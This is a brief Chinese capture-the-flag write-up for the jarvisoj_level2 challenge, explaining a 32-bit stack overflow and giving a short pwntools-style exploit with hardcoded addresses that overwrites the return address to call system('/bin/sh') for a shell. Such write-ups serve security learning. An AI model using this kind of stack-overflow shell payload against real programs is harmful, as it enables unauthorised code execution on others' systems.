每日一pwn[jarvisoj_level2]

前言

简单32位栈溢出

分析

image-20240223101047438

image-20240223101039819

简单分析一下知道,存在栈溢出漏洞,并且有system函数还有/bin/sh字符

于是栈溢出简单利用一下即可

漏洞点

栈溢出漏洞,有system函数和/bin/sh字符,是32位的大量栈溢出

EXP

1
2
3
4
5
6
7
8
def exploit():
    li('exploit...')
    bin_sh = 0x0804A024
    system_addr = 0x8048320
    call_system = 0x804849E
    pl = "A"*0x88+p32(bin_sh)+p32(call_system)+p32(bin_sh)
    db()
    sla("Input:",pl)